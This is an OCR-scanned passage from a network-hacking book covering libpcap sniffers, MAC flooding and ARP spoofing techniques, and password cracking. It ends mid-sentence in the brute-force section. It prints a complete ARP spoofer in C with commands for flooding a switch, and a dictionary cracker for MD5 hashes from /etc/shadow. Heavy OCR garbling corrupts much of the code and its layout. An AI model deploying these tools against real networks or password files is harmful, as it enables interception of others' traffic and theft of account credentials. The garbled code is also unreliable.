Here, the interface whose name is specified in the dev variable is opened and the number 
of bytes in a packet to intercept is specified (the BUFS1z value is defined in the pcap.h header 
file). The network interface is switched into the promiscuous mode and instructions are given 
to read the data until an error occurs. 

As soon as an intercept session is opened and a descriptor is recerved, numerous proper- 
ties can be determined and set before starting the packet interception process. For example, 
the type of the opened interface can be determined using the pcap datalink() function: 


if (pcap datalink(handle) != DLT_EN1OMB) {| 
fprintf(stderr, "This program only works with Ethernet cards!\n"); 
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@exit(-1); 
This code will generate an error if the selected network interface is not Ethernet 10 MB, 
100 MB, 1,000 MB, or higher. It is not mandatory to use this option, but it can be useful. 


9.1.2.3. Creating a Filter 


A filter is added to the program using the following two main functions: pcap compile() and 
peap setfilter(). 

The filter expression is stored in a regular string (a character array). The syntax of such 
expressions 1s the same as the syntax used by the tcpdump utility. 

Before the filter can be used, it must be “compiled,” which is done using the 
peap compile() function. Its prototype has the following form: 

int pcap compile(pcap t *p, struct bpf program *fp, char *str, int optimize, 

bpf u_int32 netmask) 

Here, the first argument is the descriptor of the open session. The second argument is 
a pointer to the memory area, in which the compiled filter will be stored. It is followed by the 
filter expression in a regular string. The next parameter specifies whether the expression 
should be optimized: 0 for no and 1 for yes. The last parameter is the mask of the network, 
on which the filter is to be used. The function returns -1 in case of an error; any other value 
indicates successful execution. 

After the expression is “compiled,” it must be applied, which is done using the 
pcap setfilter() function. Its prototype has the following form: 

int peap setfilter(pcap t *p, struct bpf program *fp) 


Here, the first argument is the descriptor of the open session and the second is a pointer to 
the “compiled” filter expression (as a rule, it is the second argument of the pcap_ compile () 
function). 

The following is a sample code fragment: 

#include <pcap.h> 


peap t *handle; /* Session descriptor */ 

char dev[] = "ethO"; /* Network interface to eavesdrop on */ 
char errbuf[PCAP_ERRBUF SIZE]; ‘* Buffer for error descriptions */ 
struct bpf program filter; /* Compiled filter expression */ 

char filter_app[) = "udp dst port 53"; /* The filter expression */ 

bpf u_int32 mask; /* Network mask of the interface */ 
bpf_u_int32 net; /* IP address of the interface */ 


peap lookupnet (dev, énet, &mask, errbuft); 
if (dev == NULL) { 

fprintft (stderr, "ts", errbut); 

exit (-1); 


} 


handle = pcap open live(dev, BUFSIZ, 1, 0, errbuft); 
if (handle == NULL) { 
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fprintf(stderr, "ts", errbuf); 
exit (-1); 
} 
if (strlen(errbuf) > 0) { 
fprintf(stderr, “Warning: ts", errbuf); 
errbuf[(0] = OQ; 
} 


Lf (pcap_compile(handle, &filter, filter_app, 0, mask) == -1) { 
fprintf(stderr, "$s", pcap geterr (handle)); 
@xit(-1); 
} 
if (pcap setfilter(handle, éfilter) == -1) { 
fprintf(stderr, "Ss", pcap geterr (handle) ); 
exit (-1); 


} 

This program prepares an interceptor of UDP packets arriving at port 53. 

There are two functions in the example that have not been considered yet: 
peap lookupnet () and pcap geterr(). 

The first function determines the network mask, which is then placed into the last pa- 
rameter of the pcap compile() function. The function prototype has the following form: 

int pcap lookupnet (const char *device, bpf u int32 *netp, bpf u_int32 *maskp, char 

*errbuf) 

Because only the network mask is needed, the IP address is determined just to give the 
complete picture. 

The peap geterr() function returns error descriptions; it accepts the descriptor of the 
open session as the parameter. The following is its prototype: 


char *pcap geterr(pcap t *p) 


9.1.2.4. Capturing and Processing Packets 


Packets can be captured using one of four functions: pcap next(), pcap next _ex(), 
peap dispatch(),oOrpeap loop(). 

The first two functions capture a single packet per call. The following are their prototypes: 

const u_char “pcap next(pcap t “p, struct pcap pkthdr *h) 

int pcap next ex(pcap t *p, struct pcap pkthdr **pkt header, const u_char **pkt data) 

The first argument in both functions is the descriptor of the open session. The second 
argument is a pointer to the structure describing the received packet. (The structure’s descrip- 
tion is given later in this section.) The third argument (in the second function only) is 
a pointer to the memory area in which the received packet is stored. 

The first function returns a pointer to the memory area where the received packet is 
stored. The second function returns one of the following values: 1 if the packet was read, 
2 if the timeout exceeded, -1 if an error occurred, or -2 if the stored packets have been read 
from the file and no more packets are available. 
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Combining these two functions in a loop allows a mechanism for intercepting the neces- 
sary number of packets to be implemented. The best solution, however, is to use the 
peap loop() or the pcap dispatch() function in a loop. The prototypes of these two func- 
tions are virtually identical: 

int pcap loop(pcap t *p, int cnt, peap handler callback, u_char *user) 

int pcap dispatch(pcap t *p, int cnt, pcap_ handler callback, u_char *user) 

Here, the first argument is the descriptor of the open session. The second argument is an 
integer specifying the number of packets to intercept (-1 means that packets must be inter- 
cepted until an error occurs). The third argument is the name of a callback function, which 
is automatically called by the libpcap library every time a packet arrives. The last argument can 
be used to passing some data to the callback function or is set to NULL. 

Both functions return the following values: 0 if the cnt number of packets has been inter- 
cepted, -1 if an error occurred, and -2 if the loop was terminated by the pcap breakloop() 
function (the latter is available only in the newer versions of the libpcap library). 

The only difference between these two functions is in how they process the timeout, 
whose value is specified when the pcap open _live() function is called: The pcap loop () 
function ignores timeouts and the pcap dispatch() function does not. You can learn about 
these functions inman pcap. In later examples, only the pcap loop() function is used because 
timeouts are of no interest here. 

The callback function is not just any arbitrary format function. It has its own prototype: 

void process packet (u_char “user, const struct pcap pkthdr *header, const u_char 

*packet} 

Here, the first argument is a pointer to the data passed to the callback function from the 
argument of the pcap loop() function. The second argument is a pointer to the pcap pkthdr 
structure, which describes the captured packet. This structure is defined in pcap.h as follows: 

struct pcap pkthdr { 

struct timeval ts; /* Time stamp */ 
bpf_u_int32 caplen; /* Length of the captured data */ 
bpf_u_int32 len; /* Length of this packet */ 

hi 

The last argument points to the buffer, in which the complete packet, intercepted using 
the pcap Loop() function, is stored. The callback function doesn't return any value (void). 

The purpose of the callback function is to process the received packets. This is done in 
exactly the same way as in the examples that do no use the libpcap library. That is, the neces- 
sary network packet header structures are defined and a received packet is parsed into these 
structures, with the field values output to the screen. 


9.1.2.5. Closing the Intercept Session 


An intercept session is closed using the pcap_close() function. The following is its prototype: 
void pcap close(pcap_t *p) 
The function’s only argument is the descriptor of the session that has to be closed. 
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The source code for the passive sniffer using the libpcap library, named sklsniff_pcap.c, 
can be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM. 

Programs using the libpcap library are compiled using the -1pcap option: 

# gcc sklsniff peap.c -o sklsniff pcap -lpcap 

The following is an example of a command sequence for running the sniffer: 

# ./skisniff peap tcp and dst host 192.168.10.1 


In this case, the sniffer will only capture TCP packets sent to host 192.168.10.1. 


9.2. Active Sniffers 


To get a better understanding of the essence of active sniffing, you must know what devices 
are used in local networks and their operation principles. These are the following: 


[] Repeaters and hubs transmit data arriving at one port to all other ports, without any regard 
for the nature of the data and its destination. 

O Bridges and switches are selective in the way they handle the data. They inspect the frame 
headers and send frames from one network segment to another only if the destination ad- 
dress (MAC address) pertains to another network segment. 

Routers operate at the third layer of the OSI model; thus, they send data from one subnet 
to another based on the [P header information. 


Therefore, in a network that uses only repeaters and hubs (such networks are called non- 
switched networks), a packet sent from a computer will pass through all of the network’s other 
computers, but only one computer, the one to which the packet is addressed, will receive it. 
In a nonswitched network, a passive sniffer operating in the promiscuous mode on any of the 
hosts can intercept packets exchanged among any of the network's other computers. 

A switched network uses bridges, switches, and routers. In this type of network, a passive 
sniffer can only intercept packets in the network segment, to which the computer it is installed 
on belongs. For intercepting packets from other segments of a switched network, active snif- 
fers are used. 


9.2.1. Active Sniffing Techniques 


There are many active sniffing techniques. The following are descriptions of some of the most 
popular ones. 


9.2.1.1. MAC Flooding (Switch Jamming) 


This method works on most cheap or obsolete switch models. Switches are stored the MAC 
address-to-port mapping table in memory. Flooding this memory with fake MAC addresses 
cripples the switch’s ability to send frames as addressed, and it starts sending them to all of its 
ports just like a regular hub or repeater. 
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9.2.1.2. MAC Duplicating 


In a MAC duplicating attack, the perpetrator pretends to have the victim’s MAC address. 
Now, when any frames are sent to the network from the machine with the faked MAC ad- 
dress, switches and bridges add the new route to their address tables and all data addressed to 
the victim are now routed to the impostor. The victim can also send some data to the network, 
which will cause the routers or bridges to change the route mapping in their tables to the cor- 
rect one. Therefore, the impostor has to keep sending frames with the faked MAC address to 
maintain the fake route in the address tables of the switching devices. Because the data in- 
tended for the victim are routed to the impostor, the former, naturally, does not receive them. 
This cannot go unnoticed for long; thus, the hacker must immediately resend the intercepted 
packets to the victim. Also, the hacker can only intercept the data going to the victim, not the 
data coming from him or her; that it, the interception is one-way only. 


9.2.1.3. ARP Redirect (ARP Spoofing) 


This attack belongs to the man-in-the-middle class. It works as follows: Suppose hackers want 
to intercept traffic between node A and node B in a switched network. When sending data to 
an IP address, any Ethernet node must also know the corresponding MAC address. Therefore, 
before sending data, the machine first consults its ARP cache, in which the IP-to-MAC map- 
ping table is stored, for the necessary MAC address. If the needed mapping is not in the cache, 
the node sends a broadcast ARP request. 

Hackers can send a fake ARP message to host A, saying that their machine's MAC address 
corresponds to the IP address of host B. Host A stores this mapping — the victim’s IP address 
to the impostor’s MAC address — in its ARP cache, and thereafter sends data addressed to the 
victim's IP to the impostor’s machine. This, however, covers only one direction: from host A 
to host B. To intercept traffic from host B to host A, the hackers must perform the same pro- 
cedure with the ARP cache of host B but this time supply it with false mapping of host A’s IP 
address to their machine's MAC address. This done, all traffic between host A and host B will 
pass through the hackers’ machine. 

The hackers also must periodically send ARP messages to host A and host B to maintain 
the fake cache mappings; otherwise, sooner or later the hosts will build the correct table. 

The hackers must also resend the intercepted packets to their true destinations; otherwise, 
the missing traffic will be soon noticed. This task can be taken care of using IP forwarding. 


9.2.2. Active Sniffing Modules 


An active sniffer consists of three main modules: 


O A module to direct the traffic into the home segment of the network (i.e., the segment in 
which the sniffer is installed) using one of the methods just discussed 

O A passive sniffer to analyze the intercepted traffic 

A module to forward the intercepted traffic to its true destination 
How you can build a passive sniffer was already considered in previous sections 
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Traffic can be easily forwarded to its true destination using the operating system. The 
/proc/sys/net/ipv4/ip_forward file controls packet forwarding depending on the value saved in 
it: 0 disables packet forwarding, and 1 enables forwarding of packets to the their destination 
address. The following example shows how to enable packet forwarding: 

fd = fopen("/proc/sys/net/ipv4/ip forward", “w"); 

if (fd == NULL) 

perror("failed to open /proc/sys/net/ipv4/ip forward"); 


printf (fd, “1"); 

fFolose (fd); 

This method is used in the well-known Ettercap active — sniffer 
(http://ettercap.sourceforge.net). When the hacker is done using the sniffer, the packet for- 
warding is disabled by writing 0 to the ip_forward file. 

Thus, the remaining task is to consider how to implement the module to direct the traffic 
into the home segment of the network. Combining all three modules into an active sniffer is 
a task that you can easily handle on your own, should you so desire. | don’t consider this 
aspect in the book. 


9.2.3. An ARP Spoofer Not Using the libnet Library 


This section considers a sniffer that uses all three active sniffing methods described in the pre- 
vious section. The source code for the program, named sklsniff_arp.c, is shown in Listing 9.4. 
It can also be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM. 

In the program, a structure named arp packet is defined, which includes both the 
Ethernet and the ARP headers. This makes it more convenient to sent packets. Packets are sent 
using a packet socket. Pursuant toman 7 packet, the sockaddr 11 structure must be used. The 
same man states that to send a packet, it suffices to fill the following fields of this structure: 
sll family, sll_addr, sll_halen, and sll ifindex. In the case of the example program, 
everything works perfectly with only two fields filled: s11 family and s11_ifindex. You may, 
however, fill all the fields to make sure that the program works in all situations. MAC ad- 
dresses are entered in the command line in the human-readable format as colon- or dash- 
delimited numbers. However, in the arp packet structure, MAC addresses can only be speci- 
fied in the network format. That is, if a user enters a MAC address as, for example, 
10:20:30:40:50:60, into the h_source and ar sha fields of the arp packet structure, it must 
be entered as 102030405060. 

Unfortunately, there is no standard function for converting MAC addresses to the net- 
work format; therefore, a custom function, get mac(), is used to remove the colons (or 
dashes) in the MAC address passed to it. 

For the sklsniff_ arp program, the period, at which packets are to be sent, can be set as 
needed. To send packets in an endless loop, the period is set using the sleep (period) func- 
tion. The default period is 10 seconds (period = 10). 

The remaining aspects of the sniffer’s operation ought to be clear from the source code of 
the program. 
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Listing 9.4. The ARP spoofer (skisniff_arp.c) 





#include 
#include 
finclude 
f#include 
#include 


#if  GLIBC_ 


#include 
#include 
felse 
#include 
#include 
#include 
#endif 
#include 
#include 
#include 
#include 


<stdio.h> 
<stdlib.h> 
<string.h> 
<sy5s/socket .h> 
<features.h> 

_ 2s 2 Ge 
<netpacket/packet. h> 
<net /ethernet .h> 


<asm/types .h> 
<Linux/if_packet.h> 
<linux/if_ether.h> 


<linux/if .h> 
<arpa/inet.h> 
<netdb.h> 

<sys/ioctl.h> 


#define DEVICE "etho" 


struct arp packet 


{ 


unsigned char h_dest [ETH_ALEN]; 


unsigned char h_source[ETH_ALEN]; 


unsigned short h proto; 
unsigned short ar hrd; 
unsigned short ar_ pro; 
unsigned char ar_hln; 

unsigned char ar pln; 

unsigned short ar_op; 

unsigned char ar sha[ETH ALEN]; 
unsigned char ar sip[4]; 
unsigned char ar_tha[ETH_ALEN]; 
unsigned char ar tip[4]; 


/* For the glibc version number */ 
GLIBC MINOR >= 1 


f* 


{ft 





L2 protocols */ 


L2 protecols */ 


Destination ETH address 
Source ETH address 
Packet type ID field 


Format of hardware address 
Format of protocol address 
Length of hardware address 
Length of protocol address 


ARP opcode (command) 
Sender hardware address 
Sender IP address 
Target hardware address 


' Target IP address 


jf*- sag ig ne rg Pa rn Ee a ee Pe ae ae * f 
{* Ganverniny the MAC address to the network format */ 
/* ES Pa Lt en fa a tN a Be « / 
yoid sak aaa eNaHE char* mac, char®* optarg) 
{ 

int i = 0; 

char*® ptr = strtok(optarg, "i-"); 

while(ptr) { 


unsigned nmb; 


sscanf(ptr, "%x", 


&mumb) ; 


mac{i] = (unsigned char)nmb; 
ptr = strtek(NULL, ":-"}; 


i++; 


ry 
mS 
af 
ay 
it 
*/ 
a 
ef 
ff 
ah 
ay 
= 
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i 


fter--- aa ccc recta ek pean pec all ct Goes aes ak cls Rn I el cea am Se laleaaieiemememalt it 
/* Converting the host namé into its IP address */ 
Fi PROC LICE Fetes a Rend Ca ee EE * 


void get_ip(struct in_addr* aude chars str) 
{ 


struct hostent *hp; 


if( (hp = gethostbyname(str)) == NULL) { 
herror ("gethostbyname() failed"); 
exit(-1); 

} 


beopy (hp->h_ addr, in_addr, hp->h_length); 


f Beene ne --------------* 
/* The main{) function */ 
jt Se +f 


int main(int argc, char *argv[]) 
{ 
struct sockaddr 11 s ll; 
struct in_addr src_in_addr,targ_in_addr; 
struct arp packet pkt; 
int sd; 
struct ifreq ifreq; 
char 5s ip addr[16); 
char s eth _addr[19]; 
int period = 2; 





SaaS SSS SSS SS ses=\n") Hi 





fprintf(stderr, “=== 
fprintf(stderr, "= ARP spores by Ivan Sklyaroff, 2006 =\n"); 
fprintf(stderr, "=== SSSeSSsess semen"); 





if(arge < 5) { 
fprintf(stderr, 
“usage: %s <(source ip)|| (random)> <({source mac)||(random)> <destination ip> 
<destination mac> [period(default 10 sec.}]\n", 
argv[0)); 
exit (-1)7 
} 


if (arge == 6) 
period = atoi(argv[5]); 


if ( (sd = socket (PF_PACKET, SOCK_RAW, htons(ETH_P ARP))) < 0) { 
perror("socket() failed"); 
exit(-l); 

} 


/* Filling the fields of the sockaddr_ll structure */ 
memset (&s5 ll, 0, sizeof (struct sockaddr 11)); 
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s 11.s1l_family = AF_PACKET; 


strncepy (ifreq.ifr ifrn.ifrn name, DEVICE, IFNAMSI2Z); 
if (ioctlisd, SIOCGIFINDEX, sifreq) < 0) { 

perror ("ioctl () failed"); 

exit (-1l); 
} 


s ll.sll_ ifindex = ifreq.ifr_ifru.ifru_ivalue; 


/* Filling the fields of the ARP packet */ 
pkt.h proto = htons (0606); 

pkt.ar_hrd = htons(1); 

pkt.ar pro = htons(0x800); 

pkt.ar hin = 6; 

pkt.ar pln = 4; 

pkt.ar_op = htons({1); 


get_mac(pkt.h dest, argv[4]); 
memcpy (pkt.ar tha, &pkt.h dest, 6); 
get_ip(&targ in addr, argv[3]); 


/* Sending packets in an endless loop */ 
while(1) { 
srandom (time (NULL) ) 7 
if(!stroemp(argv[1], "random") ) 
{ 
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sprinti(s ip addr, “td.td.td.%d", random() % 255, random() % 255, random() % 255, 


random() % 255); 
get_ip(asrc_in_addr, s_ip_addr); 
} 
else 
get_ip(&src_in_addr, argv[1]); 


if(!stromplargv[2], "random") } 
{ 


sprintf(s eth_addr, "%x:%x:¢x:$x:tx:%x", random() % 255, random() % 255, random() 


* 255, zrandom() % 255, random({) * 255, random() % 255); 
get_mac(pkt.ar_ sha, s_eth_addr); 
memcpy (pkt.h source, &pkt.ar sha, 6); 
} 
else { 
get_mac(pkt.ar sha, argv[2]); 
memcpy (pkt.h source, &pkt.ar sha, 6); 
} 


memcpy {pkt.ar_sip, &src_in_addr, 4); 


memcpy (pkt.ar tip, &targ_in addr, 4); 


if(sendto(sd, &pkt, sizeof(pkt), 0, (struct sockaddr *)&s ll, sizeof(struct 


sockaddr_11)) < 0) { 
perror("sendto() failed"); 
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exit (—1); 


} 


sleep (period); 
} 


return 0; 
} 





The program is compiled as usual: 

# gcc sklsniff_arp.c -o sklsniff_arp 

The following command sends random IP and MAC addresses to address 192.168.10.1 
(00:50:56:C0:00:01) every second: 

# ./sklsniff arp random random 192.168.10.1 00:50:56:C0:00:01 1 

In this way, a MAC flooding attack can be carried out. 

The ARP cache of the 192.168.10.1 host can be examined. Its contents will look similar to 
the following: 


> arp -a 

Address IP Physical address Type 

0.238.243, 90 d5-ce-d7-al-e0-5d dynamic 
§8.8.159.78 la-f0-8b-62-9f-66 dynamic 
9.114.177.209 a4-6a-Qa-42-el-a5 dynamic 
Pet. 4.145 ae-52-52-29-08—-cb dynamic 
16.74.69.183 aa-d4-83-7b-5e-75 dynamic 
17..101.240.35 b3-38-89-5d-00-0d dynamic 
295.200.136.254 13-e5-B8f-76-8e-74 dynamic 
33.167.134.206 O1-e6-6f£-94-f1-c0 dynamic 
37.80.252.251 a9-79-2b-be-97-d4 dynamic 


By passing different values to the program, it can also be used to carry out the ARP spoofing 
and MAC flooding attacks, 


9.2.4. An ARP Spoofer Using the libnet Library 


This section considers writing a program that has the same functionality as the one considered 
in the previous section (Listing 9.4) but uses the libnet library. 

The libnet library was developed by Mike Schiffman; its latest version can be downloaded 
from http://www.packetfactory.net/libnet/. Like the libpcap library, the libnet library is usu- 
ally included in all modern Linux installation distributions. 

The sequence of steps that the program must perform to form and send a packet using the 
libnet library is the following: 


Initialize a libnet session. 
Form a packet. 

Send the packet. 

Close the session. 


fe ee 


Chapter 9: Sniffers 147 


i il 


Before considering of these steps in detail, it is necessary to introduce the two important 
concepts used by the libnet library: libnet context and protocol tags. 

The [tbnet context is an opaque control structure created in memory by the libnet library that 
maintains a session state for building a complete network packet. The context is denoted as the 
libnet t type and is used in all main functions of the library. The context is an internal struc- 
ture of the libnet library, and an application programmer has no need to know its internals. 

As you already know, a complete network packet is constructed starting from the topmost 
layer and proceeding down the protocol stack. In the process, each layer adds its own header 
to the packet (see Section 3.3). The libnet library uses tags to reference a specific layer header 
in a network packet. All libnet functions, which construct network packet headers, return pro- 
tocol tags of the Libnet_ptag_t type. A constructed packet can be modified (e.g., a port num- 
ber changed) by using its protocol tags. 


9.2.4.1. Initializing a libnet Session 


A libnet session is initialized using the libnet init () function. Its prototype is the following: 
libnet_t *libnet_init (int injection_type, char *device, char *err_buf) 


The first parameter can take one of the following values: 


LIBNET LINK — Defines a data link layer interface 

LIBNET LINK ADV — Defines an expanded mode data link layer interface 
LIBNET RAW4 — Defines an [Pv4 raw socket 

LIBNET RAW4 ADV — Defines an expanded mode [Pv4 raw socket 
LIBNET RAW6 — Defines an IPv6 raw socket 

LIBNET_RAW6 ADV — Defines an expanded mode IPv6 raw socket 


OUOOOUdO 


The second parameter is the name of a network interface (e.g., ethO) or the interface’s 
IP address. It can be specified as NULL, in which case libnet will determine the necessary 
interface itself. 

The third parameter is a pointer to the buffer, to which the error description is sent if such 
is produced by the function. 

The function returns a pointer to the libnet_t context. 

The following is a sample code fragment: 


finclude <libnet .h> 


libnet _t *lc; 
char errbuf[LIBNET ERRBUF SIZE]; 


ic = libnet_init(LIBNET LINK, NULL, errbuf); 


1f (lc == NULL) { 
fprintf(stderr, "Error opening context: #3", errbuf) ; 
exit (-1); 

} 
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9.2.4.2. Constructing a Packet 


After you created the libnet context, you can start constructing a network packet. Packet 
headers are constructed proceeding from the topmost layer toward the lowest layer. Two types 
of functions can be used for this purpose: libnet build *() and libnet autobuild *(). 
Functions of the first type require the programmer to fill all (or almost all) header fields. 
When functions of the second type are used, only the main fields must be filled; the rest are 
taken care of by the libnet library automatically. 

The libnet library offers functions of the first type for practically all known protocols, 
whereas functions of the second type are available for far from all protocols. For example, an 
Ethernet header can be built using either type of function (libnet build ethernet() or 
libnet autobuild ethernet ()), but there is only a function of the first type available for 
a TCP header (1ibnet _build tep() ). At least, this is how things were in version 1.1.1 of libnet. 

The type of headers that have to be constructed in many respects depends on the injection 
type specified in the libnet init() function in the first step. For the LIBNET LINK or the 
LIBNET LINK ADV injection type, a data link layer header must be created with headers for any 
higher layers. 

No data link layer header needs to be created for any of the LIBNET RAW* types; it will be 
created by the libnet library automatically. A header for any layer can be created, starting from 
the topmost and including the internetwork layer. 

The following is an example that constructs a UDP packet: 

#include <libnet.h> 


8 


libnet_t *lc; /* Pointer to the context */ 
libnet ptag t ip4, udp; /* Protocol tags */ 

char errbuf[LIBNET ERRBUF SIZE); 

unsigned short dport = 777; /* Destination port */ 
unsigned long dst_ip; /* Destination IP address */ 
char *payload = "Hello, World!"; /* Data for sending */ 


int payload s; 


dst ip = inet _addr(argv[1]); /* IP address 15 passed via the 
command line */ 
payload s = strlen(payload); /* Length of the data */ 


/* Initializing a session */ 

le = libnet_init(LIBNET RAW4, NULL, errbuf); 

if (le == NULL) { 
fprintf(stderr, “Error opening context: ts", errbuf); 
exit (=-1); 

} 


/* Constructing a UDP header */ 
udp = libnet_build_udp/( 


1000, /* Source port */ 

dport, /* Destination port */ 

LIBNET UDP H + payload 5s, /* Total length of header and data */ 
0, /* Checksum is filled by libnet */ 


{u_int8 t*)payload, /* Pointer to the sent data */ 


Chapter 9: Sniffers 149 


payload s, /* Length of the data */ 

EC; /* Pointer to the context */ 

O); /* Constructing a new header, thus 0 */ 
if (udp == -1) { 


fprintf(stderr, "Can't build UDP header (port td): ¢s\n", 
dport, libnet geterror(lc)}); 
} 


/* Constructing an IP header */ 
ip4 = libnet_ autobuild ipvw4( 
LIBNET UDP_H + LIBNET IPV4_H + payloads, /* Packet length */ 


IPPROTO UDP, /* Protocol */ 

dst_ip, /* Destination IP address */ 

Leh? /* Pointer to the context */ 
if (ip4 == -1) { 


fprintf(stderr, "Can't build IP header: ts\n", 
libnet geterror(lc)); 


You can find the prototypes of the Libnet build udp() and libnet autobuild ipv4 () 
functions in the corresponding man pages or in the /usr/include/libnet header files. They can 
also be found in the special HTML pages that usually come in the same archive with libnet. 


9.2.4.3. Sending a Packet 


When all headers of a packet are assembled (from the topmost to the lowest protocol layer), 
the packet can be sent to the network. 

This is accomplished using the libnet_write() function, which has the following 
prototype: 

int libnet write(libnet t * 1) 


The function's only argument is a pointer to the libnet context. In case of an error, the 
function returns -1. 

To send more than one packet, the libnet_write() function can be used ina loop. 

The following is an example of using the function: 


if ((libnet_write(lc)) == -1) { 
fprintf (stderr, "Unable to send packet: s\n", libnet_geterror(lc)); 
exit(l}; 


} 


9.2.4.4. Closing the Session 


As soon as a constructed packet (or packets) is sent to the network, the session must be closed 
and all internal memory structures associated with the libnet context must be released. This is 
done using the libnet destroy() function: 


libnet destroy (1c); 
return 0; 
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The function has the following prototype: 

void libnet destroy (libnet t * 1) 

It doesn’t return any value (void). 

The source code for the active sniffer program using the libnet library, named 


sklsniff_Inet.c, can be found in the /PART II/Chapter 9 directory on the accompanying 
CD-ROM, 

You may notice that MAC addresses in this program are converted to the network format 
using the libnet hex aton() function from the libnet library, whereas the program in 
Listing 9.2 uses a custom function for this purpose. 

To compile the program using the libnet library, the following command is executed: 

# gcc sklisniff_lnet.c -o sklsniff_Inet 'libnet-config --defines' ‘ libnet-config 


--libs' 'libnet-config --cflags' 


| recommend creating a makefile to make the compilation processes more convenient. 
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Trying different password combinations is one of the methods used by crackers to obtain un- 
authorized access to protected resources. Because trying many password combinations by en- 
tering them manually is a labor-intensive task, it is del egated to special password-cracking 
programs. There are two methods used to try different password combinations: the dictionary 
method and the brute-force method. 

In the dictionary method, the attacker uses a program to try all possible words from a pre- 
viously-prepared dictionary, which contains common words most likely to be used as a pass- 
word. This method has a high success rate, but it does not work in all situations. For example, 
a password like A278NrrkZ cannot be cracked using the dictionary method; here, only going 
through all possible character combinations, or using the brute-force method, can help. 
The advantage of the brute-force method is that the password will be cracked eventually. 
Its downside is that the more complex the password — that is, the longer the password and 
the greater the mix of lowercase and uppercase letters, digits, and special characters — the 
more time it will take to crack it. Therefore, passwords created by security paranolacs may 
never be cracked. 

There is no strict distinction between the dictionary and the brute-force methods. They 
are similar in that the cracker goes through a list of potential passwords one by one and differ- 
ent in that the list may be explicitly enumerated (the dictionary method), implicitly defined 
(the brute-force method), or a combination of the two. Thus, the “brute force” label is often 
used to denote both methods. I will use the term password cracking as an umbrella for these 
two methods of password guessing, differentiating between the two as necessary. 
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The process of cracking passwords can be carried out on a local or remote machine. 
Usually, local methods are applied to recover encrypted passwords, also called hashes, from 
a password database obtained by the hacker from a compromised system. The Linux 
/etc/shadow file is an example of such a password database. As you will recall, nowadays pass- 
words can be saved in plain text only in the most primitive systems; in most cases, they are 
encrypted. In UNIX systems, passwords are encrypted using one-way hash functions; the 
crypt () function, DES, MD5, and Blowfish are among most popular encryption algorithms. 


10.1. Local Password Crackers 


I consider first a local password-cracking utility that uses the dictionary method and then 
a utility that tries all possible character combinations. 


10.1.1. Using the Dictionary Method 


The program in Listing 10.1 later in this section recovers encrypted passwords stored in the 
/etc/shadow file using the dictionary method. (The most well-known program of this type ts 
John the Ripper from a Russian hacker going by the nickname of Solar Designer.) There is no 
known way to take a hash and reverse the algorithm to derive the corresponding plain text 
password, There is, however, an easy way around this problem: Generate a hash for each word 
in the dictionary and compare it with a hash from the /etc/shadow file. If the hashes match, 
the corresponding dictionary word is the plain text password you are looking for. 

Hashes can be generated using the standard crypt () function. (John the Ripper does not 
use this function, employing instead its own highly optimized algorithms. ) 

The crypt () function encrypts passwords using the DES or MD5 algorithms. Modern 
Linux systems mainly use the MD5 password-encryption algorithm; therefore, the password- 
cracking program will only work with hashes produced by this algorithm. The following is 
example of an encrypted password from the /etc/shadow file on my system: 

$1$m$0/Kuhj$2R3684d0jUE9Mpo5 . 9Bpn1 


Passwords in the /etc/shadow file encrypted using the MD5 algorithm have the following 
structure: 


Se cs Sos eee er eress aye REEDS: een eve atic 


The hash is always preceded by a set of characters called salt. The salt part always starts 
with the $1$ character sequence and ends with the $ character, with up to eight characters 
enclosed between these delimiters. The hash following the salt is composed of a 22-byte com- 
bination of uppercase and lowercase Latin letters, digits, and the period and slash characters, 

The crypt () function has the following syntax: 

char *crypti(const char *key, const char *salt); 


The first argument, the key, is the password to be encrypted; the second argument is a salt 
value. For DES encryption, the salt value is specified with a 2-byte combination of uppercase 
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and lowercase Latin letters, digits, and the period and slash characters. For MD5 encryption, 
the salt value is specified as $1$..salt..$. 

The file containing the encrypted password (it does not necessarily have to be named 
shadow) is passed to the program in the command line. The program itself is composed of 
two loops. The outer loop reads and parses each line from the encrypted password file, ex- 
tracting the encrypted password and then the salt value from the password. 

The inner loop processes each word in the dictionary file, which is the standard Linux 
/usr/share/dict/words dictionary. Each dictionary word is passed to the crypt () function with 
the salt value that was determined in the outer loop. The result produced by the crypt () 
function is compared with the encrypted password extracted in the outer loop. If they match, 
the current dictionary word is the suspected password and is output to the screen. 





Listing 10.1. A dictionary method password cracker (bruteshadow.c) 





#include <stdio.h> 

#include <string.h> 
include <stdlib.h> 
#Hinclude <unistd.h> 


int main(int argc, char* argv[]) 
{ 
FILE *“fdl, *£d2; 
char *“strl, *str2; 
char *salt, *hash, *key, *keyl; 
char buf[13], word[100), pass[100); 


if (argc != 2) { 
fprintf(stderr, “Usage: %s <file shadow>\n", arqv[0Q]); 
ex1t(-1); 


} 


/*f Preparing buffers in the heap 
Strl = (char*)malloc(100); 
str2 = (char*)malloc(100); 


// Opening the file with encrypted passwords 
fdl = fopen(argy[1], "r"); 


fprintf(stderr, "Please, wait...\n"); 


/f Reading a line from the file per loop iteration 
while (fgets(stri, 100, fdl) != NULL) 
i 
// Looking for the $15 characters in the line 
Str2 = strstr(strl, "$S15"); 


// Finding the characters 
if (str2 != NULL) 
{ 
// Extracting the encrypted password 
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Key = strtoxk(strz, "2")7 
Ssnprintf (pass, sizeof(pass), "ts", key); 
printt (“pass=ts (%d)\n", pass, strlen(pass) |}; 


// Extracting the salt value from the encrypted password 
strtok(key, "3"); 

salt = strtok(NULL, 5"); 

hash = strtok(NULL, "\O"); // This operation can be omitted 


// Forming the salt as $1$salt5 
snprintf (buf, sizeof (buf), "$1$%ss", salt); 


// Opening the dictionary file 
fd2 = fopen("/usr/share/dict/words", "r"); 


// Reading a dictionary word per loop iteration 
while (fgets(word, 100, fd2) != NULL) 
{ 
// Stripping the new-line character 
(4word[strlen(word)])[-1] = '\0"'; 


// Calculating the new encrypted password 
keyl = eryptiword, buf); 


// Comparing both encrypted passwords 
if (!strnomp(keyl, pass, strlen(keyl))) | 
printf("OK! The password is: %s\n\n", word); 
break; 
} 


fclose (fdl); 
fclose (fd); 
free (strl); 
free(strz2); 


return O; 





10.1.2. Using the Brute-Force Method 


The program shown in Listing 10.2 recovers passwords using the brute-force method. Its operat- 
ing principle is similar to that of interlocked gears used in older mechanical speedometers. When 
the first gear makes a full turn, it catches the adjacent gear and turns it one position. The second 
gear does the same thing, and so on. Just like the first gear, the code for the first password charac- 
ter is incremented until it reaches the maximum value. When this happens, it is reset to the start- 
ing value and the code for the next character is incremented by one. Being just an example pro- 
